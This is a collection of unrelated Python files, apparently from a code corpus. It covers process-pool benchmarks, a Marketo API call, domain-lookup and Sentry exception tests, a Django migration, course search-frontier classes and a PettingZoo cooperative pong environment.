        print("%6.3f %12d %s" % (time.time() - t, self.result, test_cb))
    def run(self, cnt):
        # Single-threaded baselines first, then each enabled pool strategy.
        print("\n%d values:" % cnt)
        values = list(range(cnt))
        self.result = 0
        t = time.time()
        for value in values:
            self.result_cb(self.worker_cb(value))
        print("%6.3f %12d single threaded" % (time.time() - t, self.result))
        t = time.time()
        self.result = sum([ self.worker_cb(value) for value in values ])
        print("%6.3f %12d sum list" % (time.time() - t, self.result))
        print("fastprocesspool:")
        #self.test("map", values)
        #self.test("map_no_done", values)
        #self.test("map_done_cb", values)
        #self.test("map_failed_cb", values)
        #self.test("imap", values)
        #self.test("imap_done_cb", values)
        #self.test("imap_failed_cb", values)
        self.test("submit", values)
        self.test("submit_pool_done_cb", values)
        self.test("submit_pool_failed_cb", values)
        self.test("submit_done_cb", values)
        print("multiprocessing.pool.Pool:")
        #self.test("Pool_map", values)
        #self.test("Pool_map_async_done_cb", values)
        #self.test("Pool_apply_async_done_cb", values)
        print("concurrent.futures.ProcessPoolExecutor:")
        #self.test("ProcessPoolExecutor_map", values)
        #self.test("ProcessPoolExecutor_submit_done_cb", values)
class TestLists(object):
    """Benchmark: push whole lists through the pools and sum every element.

    Same strategies as TestValues, but each task payload is a list, so the
    per-task serialization cost is larger relative to dispatch overhead.
    """
    def __init__(self):
        self.result = 0         # accumulated sum of all list elements
        self.worker = None      # bound by test() to worker_cb
        self.worker_gen = None  # bound by test() to worker_gen_cb
    def worker_cb(self, data):
        # Identity worker: returns the list unchanged.
        return data
    def worker_gen_cb(self, data):
        yield data
    def failed_cb(self, exc):
        print(exc)
    def result_cb(self, result):
        self.result += sum(result)
    def results_cb(self, results):
        self.result += sum([ sum(result) for result in results ])
    def result_future_cb(self, result):
        # concurrent.futures done-callback: unwrap the Future first.
        self.result += sum(result.result())
    # --- fastprocesspool strategies ---
    def map(self, data):
        pool = fastprocesspool.Pool()
        pool.map(self.worker, data)
        pool.shutdown()
        self.result = sum([ sum(result) for result in pool.done ])
    def map_done_cb(self, data):
        pool = fastprocesspool.Pool(done_callback = self.result_cb)
        pool.map(self.worker, data)
        pool.shutdown()
    def map_failed_cb(self, data):
        pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
        pool.map(self.worker, data)
        pool.shutdown()
        self.result = sum([ sum(result) for result in pool.done ])
    def imap(self, data):
        pool = fastprocesspool.Pool()
        pool.imap(self.worker_gen, data)
        pool.shutdown()
        self.result = sum([ sum(result) for result in pool.done ])
    def imap_done_cb(self, data):
        pool = fastprocesspool.Pool(done_callback = self.result_cb)
        pool.imap(self.worker_gen, data)
        pool.shutdown()
    def imap_failed_cb(self, data):
        pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
        pool.imap(self.worker_gen, data)
        pool.shutdown()
        self.result = sum([ sum(result) for result in pool.done ])
    def submit(self, data):
        pool = fastprocesspool.Pool()
        for value in data:
            pool.submit(self.worker, value)
        pool.shutdown()
        self.result = sum([ sum(result) for result in pool.done ])
    def submit_done_cb(self, data):
        pool = fastprocesspool.Pool(done_callback = self.result_cb)
        for value in data:
            pool.submit(self.worker, value)
        pool.shutdown()
    def submit_failed_cb(self, data):
        pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
        for value in data:
            pool.submit(self.worker, value)
        pool.shutdown()
        self.result = sum([ sum(result) for result in pool.done ])
    # --- multiprocessing.pool.Pool strategies ---
    def Pool_map(self, data):
        pool = Pool()
        results = pool.map(self.worker, data)
        pool.close()
        pool.join()
        self.result = sum([ sum(result) for result in results ])
    def Pool_map_async_done_cb(self, data):
        pool = Pool()
        pool.map_async(self.worker, data, callback = self.results_cb)
        pool.close()
        pool.join()
    def Pool_apply_async_done_cb(self, data):
        pool = Pool()
        for value in data:
            pool.apply_async(self.worker, ( value, ), callback = self.result_cb)
        pool.close()
        pool.join()
    # --- concurrent.futures strategies ---
    def ProcessPoolExecutor_map(self, data):
        pool = ProcessPoolExecutor()
        results = pool.map(self.worker, data)
        pool.shutdown()
        self.result = sum([ sum(result) for result in results ])
    def ProcessPoolExecutor_submit_done_cb(self, data):
        pool = ProcessPoolExecutor()
        for value in data:
            future = pool.submit(self.worker, value)
            future.add_done_callback(self.result_future_cb)
        pool.shutdown()
    def test(self, test_cb, data):
        # Reset state, bind the workers, time one strategy by name, print a row.
        self.result = 0
        self.worker = self.worker_cb
        self.worker_gen = self.worker_gen_cb
        t = time.time()
        getattr(self, test_cb)(data)
        print("%6.3f %10d %s" % (time.time() - t, self.result, test_cb))
    def run(self, n, cnt):
        # n tasks, each carrying the same cnt-element list.
        print("\n%d lists with %d values:" % (n, cnt))
        v = list(range(cnt))
        values = [ v for _ in range(n) ]
        self.result = 0
        t = time.time()
        for value in values:
            self.result_cb(self.worker_cb(value))
        print("%6.3f %10d single threaded" % (time.time() - t, self.result))
        print("fastprocesspool:")
        self.test("map", values)
        self.test("map_done_cb", values)
        self.test("map_failed_cb", values)
        self.test("imap", values)
        self.test("imap_done_cb", values)
        self.test("imap_failed_cb", values)
        self.test("submit", values)
        self.test("submit_done_cb", values)
        self.test("submit_failed_cb", values)
        print("multiprocessing.pool.Pool:")
        self.test("Pool_map", values)
        self.test("Pool_map_async_done_cb", values)
        self.test("Pool_apply_async_done_cb", values)
        print("concurrent.futures.ProcessPoolExecutor:")
        self.test("ProcessPoolExecutor_map", values)
        self.test("ProcessPoolExecutor_submit_done_cb", values)
class TestCompress(object):
    """Benchmark: CPU-bound zstd compression (optionally preceded by msgpack
    packing) distributed across the pools.

    Unlike TestValues/TestLists, the workers do real work, so this measures
    parallel speed-up rather than pure dispatch overhead.
    """
    def __init__(self):
        self.result = []        # collected compressed blobs
        self.worker = None      # bound by the test helpers to a compress worker
        self.worker_gen = None  # generator flavour of the same worker
    def compress_cb(self, data):
        # zstd level 14 with size + checksum headers written to the frame.
        return zstd.ZstdCompressor(write_content_size = True, write_checksum = True,
                level = 14).compress(data)
    def compress_gen_cb(self, data):
        yield zstd.ZstdCompressor(write_content_size = True, write_checksum = True,
                level = 14).compress(data)
    def pack_compress_cb(self, data):
        # msgpack-serialize first, then compress the packed bytes.
        result = zstd.ZstdCompressor(write_content_size = True, write_checksum = True,
                level = 14).compress(msgpack.packb(data))
        return result
    def pack_compress_gen_cb(self, data):
        yield zstd.ZstdCompressor(write_content_size = True, write_checksum = True,
                level = 14).compress(msgpack.packb(data))
    def failed_cb(self, exc):
        print(exc)
    def result_cb(self, result):
        self.result.append(result)
    def results_cb(self, results):
        # Callback receiving the whole result list at once (map_async).
        self.result.extend(results)
    def result_future_cb(self, result):
        # concurrent.futures done-callback: unwrap the Future first.
        self.result.append(result.result())
    # --- fastprocesspool strategies ---
    def map(self, data):
        pool = fastprocesspool.Pool()
        pool.map(self.worker, data)
        pool.shutdown()
        self.result = list(pool.done)
    def map_done_cb(self, data):
        pool = fastprocesspool.Pool(done_callback = self.result_cb)
        pool.map(self.worker, data)
        pool.shutdown()
    def map_failed_cb(self, data):
        pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
        pool.map(self.worker, data)
        pool.shutdown()
        self.result = list(pool.done)
    def imap(self, data):
        pool = fastprocesspool.Pool()
        pool.imap(self.worker_gen, data)
        pool.shutdown()
        self.result = list(pool.done)
    def imap_done_cb(self, data):
        pool = fastprocesspool.Pool(done_callback = self.result_cb)
        pool.imap(self.worker_gen, data)
        pool.shutdown()
    def imap_failed_cb(self, data):
        pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
        pool.imap(self.worker_gen, data)
        pool.shutdown()
        self.result = list(pool.done)
    def submit(self, data):
        pool = fastprocesspool.Pool()
        for value in data:
            pool.submit(self.worker, value)
        pool.shutdown()
        self.result = list(pool.done)
    def submit_done_cb(self, data):
        pool = fastprocesspool.Pool(done_callback = self.result_cb)
        for value in data:
            pool.submit(self.worker, value)
        pool.shutdown()
    def submit_failed_cb(self, data):
        pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
        for value in data:
            pool.submit(self.worker, value)
        pool.shutdown()
        self.result = list(pool.done)
    # --- multiprocessing.pool.Pool strategies ---
    def Pool_map(self, data):
        pool = Pool()
        results = pool.map(self.worker, data)
        pool.close()
        pool.join()
        self.result = results
    def Pool_map_async_done_cb(self, data):
        pool = Pool()
        pool.map_async(self.worker, data, callback = self.results_cb)
        pool.close()
        pool.join()
    def Pool_apply_async_done_cb(self, data):
        pool = Pool()
        for value in data:
            pool.apply_async(self.worker, ( value, ), callback = self.result_cb)
        pool.close()
        pool.join()
    # --- concurrent.futures strategies ---
    def ProcessPoolExecutor_map(self, data):
        pool = ProcessPoolExecutor()
        results = pool.map(self.worker, data)
        pool.shutdown()
        self.result = list(results)
    def ProcessPoolExecutor_submit_done_cb(self, data):
        pool = ProcessPoolExecutor()
        for value in data:
            future = pool.submit(self.worker, value)
            future.add_done_callback(self.result_future_cb)
        pool.shutdown()
    def test_compress(self, test_cb, data):
        # Time one strategy using the compress-only workers.
        self.result = []
        self.worker = self.compress_cb
        self.worker_gen = self.compress_gen_cb
        t = time.time()
        getattr(self, test_cb)(data)
        print("%6.3f %10d %s" % (time.time() - t, len(self.result), test_cb))
    def test_pack_compress(self, test_cb, data):
        # Time one strategy using the msgpack+compress workers.
        self.result = []
        self.worker = self.pack_compress_cb
        self.worker_gen = self.pack_compress_gen_cb
        t = time.time()
        getattr(self, test_cb)(data)
        print("%6.3f %10d %s" % (time.time() - t, len(self.result), test_cb))
    def run_compress(self, n, cnt):
        # cnt tasks, each compressing the same pre-packed n-integer payload.
        packed_values = msgpack.packb(list(range(n)))
        print("\nCompress %d times %d values:" % (cnt, n))
        values = [ packed_values for _ in range(cnt) ]
        self.result = []
        t = time.time()
        for value in values:
            self.result_cb(self.compress_cb(value))
        print("%6.3f %10d single threaded" % (time.time() - t, len(self.result)))
        print("fastprocesspool:")
        self.test_compress("map", values)
        self.test_compress("map_done_cb", values)
        self.test_compress("map_failed_cb", values)
        self.test_compress("imap", values)
        self.test_compress("imap_done_cb", values)
        self.test_compress("imap_failed_cb", values)
        self.test_compress("submit", values)
        self.test_compress("submit_done_cb", values)
        self.test_compress("submit_failed_cb", values)
        print("multiprocessing.pool.Pool:")
        self.test_compress("Pool_map", values)
        self.test_compress("Pool_map_async_done_cb", values)
        self.test_compress("Pool_apply_async_done_cb", values)
        print("concurrent.futures.ProcessPoolExecutor:")
        self.test_compress("ProcessPoolExecutor_map", values)
        self.test_compress("ProcessPoolExecutor_submit_done_cb", values)
    def run_pack_compress(self, n, cnt):
        # cnt tasks, each packing and compressing an n-integer list.
        print("\nPack and compress %d times %d values:" % (cnt, n))
        values = [ list(range(n)) for _ in range(cnt) ]
        self.result = []
        t = time.time()
        for value in values:
            self.result_cb(self.pack_compress_cb(value))
        print("%6.3f %10d single threaded" % (time.time() - t, len(self.result)))
        print("fastprocesspool:")
        self.test_pack_compress("map", values)
        self.test_pack_compress("map_done_cb", values)
        self.test_pack_compress("map_failed_cb", values)
        self.test_pack_compress("imap", values)
        self.test_pack_compress("imap_done_cb", values)
        self.test_pack_compress("imap_failed_cb", values)
        self.test_pack_compress("submit", values)
        self.test_pack_compress("submit_done_cb", values)
        self.test_pack_compress("submit_failed_cb", values)
        print("multiprocessing.pool.Pool:")
        self.test_pack_compress("Pool_map", values)
        self.test_pack_compress("Pool_map_async_done_cb", values)
        self.test_pack_compress("Pool_apply_async_done_cb", values)
        print("concurrent.futures.ProcessPoolExecutor:")
        self.test_pack_compress("ProcessPoolExecutor_map", values)
        self.test_pack_compress("ProcessPoolExecutor_submit_done_cb", values)
    def run(self, n, cnt):
        self.run_compress(n, cnt)
        self.run_pack_compress(n, cnt)
if __name__ == "__main__":
    # Run the single-value benchmark with a tiny workload by default;
    # the larger runs and the list/compress suites are left commented out.
    test = TestValues()
    test.run(5)
    #test.run(1000000)
    #test = TestLists()
    #test.run(20000, 10000)
    #test = TestCompress()
    #test.run(1000, 10000)
|
#input variables to Developer Newsletter Creation Step 13: Get Smart Campaigns
input={
'token': 'Token', #from Step 2: Get Token
'parent id': 'fid', #from Step 3: Get Parent ID or Create Parent Folder
}
import requests
import re
authorization = "Bearer " + input['token']
url = "https://028-jjw-728.mktorest.com//rest/asset/v1/smartCampaigns.json?folder={\"id\":"+ input['program_id']+", \"type\": \"Program\"}"
payload = {}
headers = {
'Authorization': authorization
}
response = requests.request("GET", url, headers=headers, data = payload)
smart_campaigns = re.findall('"id":(\d*),"name":',response.text )
print(response.text)
return {'sc_ids':smart_campaigns}
|
# -*- coding: utf-8 -*-
"""
"""
import pytest
import json
from assassin.lib.helper_functions import validate_ip
from assassin.lib.helper_functions import getDomainInfo
def test_getDomaininfo_com(capsys):
    """RDAP lookup for a .com domain yields an objectClassName entry."""
    response = getDomainInfo('cnn.com')
    json_data = json.loads(json.dumps(response))
    assert 'objectClassName' in json_data
def test_getDomaininfo_net(capsys):
    """RDAP lookup for a .net domain yields an objectClassName entry."""
    response = getDomainInfo('bitsmasher.net')
    json_data = json.loads(json.dumps(response))
    assert 'objectClassName' in json_data
def test_getDomaininfo_org(capsys):
    """RDAP lookup for a .org domain yields an objectClassName entry.

    Renamed from test_getDomaininfo_net: the duplicate name shadowed the
    earlier .net test, so pytest silently skipped one of the two.
    """
    response = getDomainInfo('slashdot.org')
    temp = json.dumps(response)
    json_data = json.loads(temp)
    assert 'objectClassName' in json_data
# Module metadata.
__author__ = 'Franklin Diaz'
__copyright__ = ''
# NOTE(review): '{credit_list}' looks like an unexpanded template placeholder.
__credits__ = ['{credit_list}']
__license__ = 'http://www.apache.org/licenses/LICENSE-2.0'
__version__ = ''
__maintainer__ = ''
__email__ = 'fdiaz@paloaltonetworks.com'
# Generated by Django 3.1.6 on 2021-03-20 10:16
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional ``email`` column to the ``order`` model."""
    dependencies = [
        ('api', '0017_auto_20210320_1014'),
    ]
    operations = [
        migrations.AddField(
            model_name='order',
            name='email',
            # Nullable so existing rows need no backfill.
            field=models.EmailField(max_length=254, null=True),
        ),
    ]
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from exam import fixture
from sentry.interfaces.exception import (
SingleException, Exception, trim_exceptions
)
from sentry.testutils import TestCase
class ExceptionTest(TestCase):
    """Tests for the aggregate exception interface (Exception.to_python)."""
    @fixture
    def interface(self):
        # Two identical ValueError entries, each with one in-app frame.
        return Exception.to_python(dict(values=[{
            'type': 'ValueError',
            'value': 'hello world',
            'module': 'foo.bar',
            'stacktrace': {'frames': [{
                'filename': 'foo/baz.py',
                'lineno': 1,
                'in_app': True,
            }]},
        }, {
            'type': 'ValueError',
            'value': 'hello world',
            'module': 'foo.bar',
            'stacktrace': {'frames': [{
                'filename': 'foo/baz.py',
                'lineno': 1,
                'in_app': True,
            }]},
        }]))
    def test_path(self):
        assert self.interface.get_path() == 'sentry.interfaces.Exception'
    def test_args_as_keyword_args(self):
        # A list of dicts under 'values' is the modern payload shape.
        inst = Exception.to_python(dict(values=[{
            'type': 'ValueError',
            'value': 'hello world',
            'module': 'foo.bar',
        }]))
        assert type(inst.values[0]) is SingleException
        assert inst.values[0].type == 'ValueError'
        assert inst.values[0].value == 'hello world'
        assert inst.values[0].module == 'foo.bar'
    def test_args_as_old_style(self):
        # A bare single-exception dict (legacy payload) is wrapped as values[0].
        inst = Exception.to_python({
            'type': 'ValueError',
            'value': 'hello world',
            'module': 'foo.bar',
        })
        assert type(inst.values[0]) is SingleException
        assert inst.values[0].type == 'ValueError'
        assert inst.values[0].value == 'hello world'
        assert inst.values[0].module == 'foo.bar'
    def test_serialize_unserialize_behavior(self):
        # Round-tripping through to_json()/to_python() must be lossless.
        result = type(self.interface).to_python(self.interface.to_json())
        assert result.to_json() == self.interface.to_json()
    def test_to_string(self):
        result = self.interface.to_string(self.event)
        # NOTE(review): leftover debug output (Python 2 print statement);
        # consider removing.
        print result
        assert result == """ValueError: hello world
  File "foo/baz.py", line 1
ValueError: hello world
  File "foo/baz.py", line 1"""
    def test_get_hash(self):
        # The aggregate hash is the concatenation of each child's hash parts.
        inst = self.interface
        all_values = sum([v.get_hash() for v in inst.values], [])
        assert inst.get_hash() == all_values
    def test_context_with_mixed_frames(self):
        # One in-app frame plus one system frame -> hasSystemFrames is True.
        inst = Exception.to_python(dict(values=[{
            'type': 'ValueError',
            'value': 'hello world',
            'module': 'foo.bar',
            'stacktrace': {'frames': [{
                'filename': 'foo/baz.py',
                'lineno': 1,
                'in_app': True,
            }]},
        }, {
            'type': 'ValueError',
            'value': 'hello world',
            'module': 'foo.bar',
            'stacktrace': {'frames': [{
                'filename': 'foo/baz.py',
                'lineno': 1,
                'in_app': False,
            }]},
        }]))
        self.create_event(data={
            'sentry.interfaces.Exception': inst.to_json(),
        })
        context = inst.get_api_context()
        assert context['hasSystemFrames']
    def test_context_with_only_system_frames(self):
        # All system frames -> the flag is not set (nothing to de-emphasize).
        inst = Exception.to_python(dict(values=[{
            'type': 'ValueError',
            'value': 'hello world',
            'module': 'foo.bar',
            'stacktrace': {'frames': [{
                'filename': 'foo/baz.py',
                'lineno': 1,
                'in_app': False,
            }]},
        }, {
            'type': 'ValueError',
            'value': 'hello world',
            'module': 'foo.bar',
            'stacktrace': {'frames': [{
                'filename': 'foo/baz.py',
                'lineno': 1,
                'in_app': False,
            }]},
        }]))
        self.create_event(data={
            'sentry.interfaces.Exception': inst.to_json(),
        })
        context = inst.get_api_context()
        assert not context['hasSystemFrames']
    def test_context_with_only_app_frames(self):
        # All in-app frames -> likewise no system-frame flag.
        inst = Exception.to_python(dict(values=[{
            'type': 'ValueError',
            'value': 'hello world',
            'module': 'foo.bar',
            'stacktrace': {'frames': [{
                'filename': 'foo/baz.py',
                'lineno': 1,
                'in_app': True,
            }]},
        }, {
            'type': 'ValueError',
            'value': 'hello world',
            'module': 'foo.bar',
            'stacktrace': {'frames': [{
                'filename': 'foo/baz.py',
                'lineno': 1,
                'in_app': True,
            }]},
        }]))
        self.create_event(data={
            'sentry.interfaces.Exception': inst.to_json(),
        })
        context = inst.get_api_context()
        assert not context['hasSystemFrames']
class SingleExceptionTest(TestCase):
    """Tests for one exception entry (SingleException.to_python)."""
    @fixture
    def interface(self):
        return SingleException.to_python(dict(
            type='ValueError',
            value='hello world',
            module='foo.bar',
        ))
    def test_serialize_behavior(self):
        # Serialized form carries every field; a missing stacktrace is an
        # explicit None rather than being omitted.
        assert self.interface.to_json() == {
            'type': self.interface.type,
            'value': self.interface.value,
            'module': self.interface.module,
            'stacktrace': None,
        }
    def test_get_hash(self):
        assert self.interface.get_hash() == [
            self.interface.type,
            self.interface.value,
        ]
    def test_get_hash_without_type(self):
        # With no type, the hash falls back to the value alone.
        self.interface.type = None
        assert self.interface.get_hash() == [
            self.interface.value,
        ]
    def test_get_hash_without_value(self):
        # With no value, the hash falls back to the type alone.
        self.interface.value = None
        assert self.interface.get_hash() == [
            self.interface.type,
        ]
    def test_serialize_unserialize_behavior(self):
        # Round-tripping through to_json()/to_python() must be lossless.
        result = type(self.interface).to_python(self.interface.to_json())
        assert result.to_json() == self.interface.to_json()
    def test_only_requires_only_type_or_value(self):
        # Either field alone is sufficient to construct the interface.
        SingleException.to_python(dict(
            type='ValueError',
        ))
        SingleException.to_python(dict(
            value='ValueError',
        ))
    def test_throws_away_empty_stacktrace(self):
        # A stacktrace with zero frames is dropped entirely.
        result = SingleException.to_python(dict(
            type='ValueError',
            value='foo',
            stacktrace={'frames': []},
        ))
        assert not result.stacktrace
    def test_coerces_object_value_to_string(self):
        # Non-string values are JSON-encoded into the value field.
        result = SingleException.to_python(dict(
            type='ValueError',
            value={'unauthorized': True},
        ))
        assert result.value == '{"unauthorized":true}'
class TrimExceptionsTest(TestCase):
    """Tests for trim_exceptions(), which caps the exception-chain length."""
    def test_under_max(self):
        # At or below the limit nothing is removed and no marker is set.
        value = {'values': [{'value': 'foo'}]}
        trim_exceptions(value)
        assert len(value['values']) == 1
        assert value.get('exc_omitted') is None
    def test_over_max(self):
        # Five entries trimmed to four: head and tail survive, the middle
        # entry (index 2) is dropped.
        values = []
        for n in xrange(5):
            values.append({'value': 'frame %d' % n})
        value = {'values': values}
        trim_exceptions(value, max_values=4)
        assert len(value['values']) == 4
        for value, num in zip(values[:2], xrange(2)):
            assert value['value'] == 'frame %d' % num
        for value, num in zip(values[2:], xrange(3, 5)):
            assert value['value'] == 'frame %d' % num
|
# frontiers.py
# ----------------
# COMP3620/6320 Artificial Intelligence
# The Australian National University
# For full attributions, see attributions.txt on Wattle at the end of the course.
""" This file contains data structures useful for representing search frontiers
for your depth-first, breadth-first, and a-star search algorithms (Q1-3).
You do not have to use these, but it is strongly recommended.
********** YOU SHOULD NOT CHANGE ANYTHING IN THIS FILE **********
"""
import collections
import heapq
class Stack(object):
    """ A last-in-first-out (LIFO) container backed by a Python list."""
    def __init__(self):
        """ Create a new empty Stack.
            (Stack) -> None
        """
        self.contents = []
    def push(self, item):
        """ Place item on top of the stack.
            (Stack, object) -> None
        """
        self.contents.append(item)
    def pop(self):
        """ Remove and return the item on top of the stack.
            (Stack) -> object
        """
        return self.contents.pop()
    def peek(self):
        """ Return, without removing, the item on top of the stack.
            (Stack) -> object
        """
        return self.contents[-1]
    def is_empty(self):
        """ True iff the stack currently holds no items.
            (Stack) -> bool
        """
        return len(self.contents) == 0
    def find(self, f):
        """ Return the first stored item for which f(item) is truthy, or
            None when no item matches.
            (Stack, (object) -> object/None) -> object
        """
        return next((item for item in self.contents if f(item)), None)
    def __str__(self):
        """ String form of the stack's contents.
            (Stack) -> str
        """
        return str(self.contents)
class Queue(object):
    """ A first-in-first-out (FIFO) container.

        Backed by a collections.deque so that both enqueue (right append)
        and dequeue (left pop) run in constant time, unlike a plain list
        whose head operations are linear.
    """
    def __init__(self):
        """ Create a new empty Queue.
            (Queue) -> None
        """
        self.contents = collections.deque()
    def push(self, item):
        """ Add item to the back of the queue.
            (Queue, object) -> None
        """
        self.contents.append(item)
    def pop(self):
        """ Remove and return the item at the front of the queue.
            (Queue) -> object
        """
        return self.contents.popleft()
    def peek(self):
        """ Return, without removing, the item at the front of the queue.
            (Queue) -> object
        """
        return self.contents[0]
    def is_empty(self):
        """ True iff the queue currently holds no items.
            (Queue) -> bool
        """
        return len(self.contents) == 0
    def find(self, f):
        """ Return the first stored item for which f(item) is truthy, or
            None when no item matches.
            (Queue, (object) -> object/None) -> object
        """
        return next((item for item in self.contents if f(item)), None)
    def __str__(self):
        """ String form of the queue's contents, front first.
            (Queue) -> str
        """
        return str(list(self.contents))
class PriorityQueue(object):
    """ A min-priority queue built on heapq.

        Each heap entry is a (priority, insertion_counter, item) triple; the
        monotonically increasing counter breaks priority ties in FIFO order
        and prevents heapq from ever comparing items directly.
    """
    def __init__(self):
        """ Create a new empty priority queue.
            (PriorityQueue) -> None
        """
        self.heap = []
        self.count = 0
    def push(self, item, priority):
        """ Add item to the queue with the given priority.
            (PriorityQueue, object, number) -> None
        """
        entry = (priority, self.count, item)
        heapq.heappush(self.heap, entry)
        self.count += 1
    def pop(self):
        """ Remove and return the lowest-priority item, ties FIFO.
            (PriorityQueue) -> object
        """
        _, _, item = heapq.heappop(self.heap)
        return item
    def peek(self):
        """ Return, without removing, the lowest-priority item, ties FIFO.
            (PriorityQueue) -> object
        """
        return self.heap[0][2]
    def is_empty(self):
        """ True iff the queue currently holds no items.
            (PriorityQueue) -> bool
        """
        return len(self.heap) == 0
    def find(self, f):
        """ Return some stored item for which f(item) is truthy, or None
            when no item matches. Note that the parameter `f` is a function.
            (PriorityQueue, (object) -> object/None) -> object
        """
        return next((entry[2] for entry in self.heap if f(entry[2])), None)
    def change_priority(self, item, priority):
        """ Give item the specified priority, re-heapifying afterwards.
            Raises ValueError when item is not in the queue.
            (PriorityQueue, object, int) -> None
        """
        for position, entry in enumerate(self.heap):
            if entry[2] == item:
                self.heap[position] = (priority, self.count, item)
                self.count += 1
                heapq.heapify(self.heap)
                return
        raise ValueError("Error: " + str(item) +
                         " is not in the PriorityQueue.")
    def __str__(self):
        """ String form of the stored items; the order is unspecified.
            (PriorityQueue) -> str
        """
        return str([entry[2] for entry in self.heap])
class PriorityQueueWithFunction(PriorityQueue):
    """ A PriorityQueue whose push() computes each item's priority with a
        caller-supplied function, so it matches the one-argument push
        signature of Stack and Queue and can replace either of them.
    """
    def __init__(self, priority_function):
        """ Create an empty queue that prioritises items via priority_function.
            (PriorityQueueWithFunction, (object) -> number) -> None
        """
        super(PriorityQueueWithFunction, self).__init__()
        self.priority_function = priority_function
    def push(self, item):
        """" Add item to the queue, deriving its priority automatically.
            (PriorityQueueWithFunction, object) -> None
        """
        priority = self.priority_function(item)
        heapq.heappush(self.heap, (priority, self.count, item))
        self.count += 1
|
import os
import gym
import numpy as np
import pygame
from gym.utils import EzPickle, seeding
from pettingzoo import AECEnv
from pettingzoo.utils import wrappers
from pettingzoo.utils.agent_selector import agent_selector
from pettingzoo.utils.conversions import parallel_wrapper_fn
from .ball import Ball
from .cake_paddle import CakePaddle
from .paddle import Paddle
FPS = 15
def deg_to_rad(deg):
    """Convert an angle from degrees to radians."""
    return np.pi * deg / 180
def get_flat_shape(width, height, kernel_window_length=2):
    """Element count after downsampling a width x height screen by
    `kernel_window_length` in both dimensions (truncated to int)."""
    window_area = kernel_window_length * kernel_window_length
    return int(width * height / window_area)
def original_obs_shape(screen_width, screen_height, kernel_window_length=2):
    """Single-channel (H, W, 1) observation shape: the doubled screen
    dimensions downsampled by `kernel_window_length`."""
    obs_height = int(screen_height * 2 / kernel_window_length)
    obs_width = int(screen_width * 2 / kernel_window_length)
    return (obs_height, obs_width, 1)
def get_valid_angle(randomizer):
    """Draw an angle in [0, 2*pi) avoiding near-vertical and
    near-horizontal directions, via rejection sampling on
    ``randomizer.rand()``.

    Excluded regions (degrees): (90 +- 25), (270 +- 25), (180 +- 10),
    (350, 360) and [0, 10) -- i.e. (65, 115), (245, 295), (170, 190),
    plus the wrap-around band about 0/360.
    """
    def rad(deg):
        # degrees -> radians (kept local; behaviour matches deg_to_rad)
        return deg * np.pi / 180

    ver_deg_range = 25
    hor_deg_range = 10
    forbidden_bands = [
        (rad(90 - ver_deg_range), rad(90 + ver_deg_range)),
        (rad(270 - ver_deg_range), rad(270 + ver_deg_range)),
        (rad(180 - hor_deg_range), rad(180 + hor_deg_range)),
    ]
    high_wrap = rad(360 - hor_deg_range)
    low_wrap = rad(0 + hor_deg_range)

    def invalid(a):
        if a > high_wrap or a < low_wrap:
            return True
        return any(lo < a < hi for lo, hi in forbidden_bands)

    # angle = 0 is itself invalid, so at least one sample is always drawn.
    angle = 0
    while invalid(angle):
        angle = 2 * np.pi * randomizer.rand()
    return angle
class CooperativePong:
    """Two-paddle cooperative pong backed by a pygame surface.

    Both agents share the goal of keeping the ball in play: each frame the
    ball survives earns max_reward / max_cycles, and the episode ends with
    off_screen_penalty when the ball leaves the screen (or after
    max_cycles frames).
    """

    def __init__(self, randomizer, ball_speed=9, left_paddle_speed=12, right_paddle_speed=12, cake_paddle=True, max_cycles=900, bounce_randomness=False, max_reward=100, off_screen_penalty=-10, render_ratio=2, kernel_window_length=2):
        """Create the game surface, paddles, ball and gym spaces.

        render_ratio shrinks the nominal 960x560 screen; cake_paddle swaps
        the right paddle for the multi-tier CakePaddle.
        """
        super().__init__()
        pygame.init()
        self.num_agents = 2
        self.render_ratio = render_ratio
        self.kernel_window_length = kernel_window_length
        # Display screen
        self.s_width, self.s_height = 960 // render_ratio, 560 // render_ratio
        self.screen = pygame.Surface((self.s_width, self.s_height))  # (960, 720) # (640, 480) # (100, 200)
        self.area = self.screen.get_rect()
        self.max_reward = max_reward
        self.off_screen_penalty = off_screen_penalty
        # define action and observation spaces (one per agent; 3 discrete
        # actions: stay / up / down)
        self.action_space = [gym.spaces.Discrete(3) for _ in range(self.num_agents)]
        original_shape = original_obs_shape(self.s_width, self.s_height, kernel_window_length=kernel_window_length)
        original_color_shape = (original_shape[0], original_shape[1], 3)
        self.observation_space = [gym.spaces.Box(low=0, high=255, shape=(original_color_shape), dtype=np.uint8) for _ in range(self.num_agents)]
        # define the global space of the environment or state
        self.state_space = gym.spaces.Box(low=0, high=255, shape=((self.s_height, self.s_width, 3)), dtype=np.uint8)
        self.renderOn = False
        # set speed
        self.speed = [ball_speed, left_paddle_speed, right_paddle_speed]
        self.max_cycles = max_cycles
        # paddles
        self.p0 = Paddle((20 // render_ratio, 80 // render_ratio), left_paddle_speed)
        if cake_paddle:
            self.p1 = CakePaddle(right_paddle_speed, render_ratio=render_ratio)
        else:
            self.p1 = Paddle((20 // render_ratio, 100 // render_ratio), right_paddle_speed)
        self.agents = ["paddle_0", "paddle_1"]  # list(range(self.num_agents))
        # ball
        self.ball = Ball(randomizer, (20 // render_ratio, 20 // render_ratio), ball_speed, bounce_randomness)
        self.randomizer = randomizer
        self.reinit()

    def reinit(self):
        """Reset the per-episode reward/done/info bookkeeping and score."""
        self.rewards = dict(zip(self.agents, [0.0] * len(self.agents)))
        self.dones = dict(zip(self.agents, [False] * len(self.agents)))
        self.infos = dict(zip(self.agents, [{}] * len(self.agents)))
        self.score = 0

    def reset(self):
        """Recentre the ball with a fresh valid angle, reset paddles and
        counters, and draw the first frame."""
        # reset ball and paddle init conditions
        self.ball.rect.center = self.area.center
        # set the direction to an angle between [0, 2*np.pi)
        angle = get_valid_angle(self.randomizer)
        # angle = deg_to_rad(89)
        self.ball.speed = [int(self.ball.speed_val * np.cos(angle)), int(self.ball.speed_val * np.sin(angle))]
        self.p0.rect.midleft = self.area.midleft
        self.p1.rect.midright = self.area.midright
        self.p0.reset()
        self.p1.reset()
        self.p0.speed = self.speed[1]
        self.p1.speed = self.speed[2]
        self.done = False
        self.num_frames = 0
        self.reinit()
